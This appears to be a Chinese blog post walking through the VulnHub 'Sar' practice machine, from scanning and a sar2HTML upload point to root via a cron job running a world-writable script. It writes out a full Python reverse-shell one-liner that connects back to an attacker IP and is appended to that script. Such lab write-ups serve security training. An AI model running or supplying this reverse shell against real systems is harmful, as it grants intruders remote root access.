VulnHub靶机 | Sar

发布于 2022-10-08  302 次阅读


“纸上得来终觉浅,绝知此事要躬行”
项目地址
https://download.vulnhub.com/sar/sar.zip

复现过程

主机发现

端口探测

目录扫描

  • 访问robots.txt文件
  • 访问sar2HTML
  • 点击New发现上传点,搜索sar2HTML发现有默认上传路径,使用中国蚁剑连接

提权

  • 拿到shell后首先尝试了suid提权,内核提权,但是没有成功!到家目录里面也没有发现特殊文件,然后到网站的根目录下寻找特殊文件。
  • 发现了两个特殊文件 :finally.sh这个文件属于root,write.sh这个文件具有777权限。查看一下这两个文件里面的内容。
  • 发现finally.sh里的内容就是执行write.sh文件,write.sh文件的作用就是创建一个文件/tmp/gateway。由此想到了计划任务提权,查看一下 定时任务的配置文件/etc/crontab
  • 发现定时计划中有finally.sh,系统会每五分钟就以root权限执行finally.sh。现在将反弹shell的代码写入write.sh中。
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.124.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> write.sh

提权成功


我从未觉得繁琐,说浪漫些,我很爱你。